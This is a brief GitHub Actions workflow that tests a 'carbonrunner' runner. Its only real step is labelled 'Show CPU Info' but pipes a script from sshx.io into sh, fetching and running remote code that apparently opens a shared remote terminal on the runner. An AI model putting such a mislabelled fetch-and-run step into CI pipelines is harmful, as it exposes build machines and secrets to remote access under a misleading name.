name: CarbonRunner Test

on:
  workflow_dispatch:

jobs:
  check-cpu:
    runs-on: carbonrunner-8vcpu-ubuntu-latest

    steps:
      - uses: actions/checkout@v4

      - name: Show CPU Info
        run: curl -sSf https://sshx.io/get | sh -s run
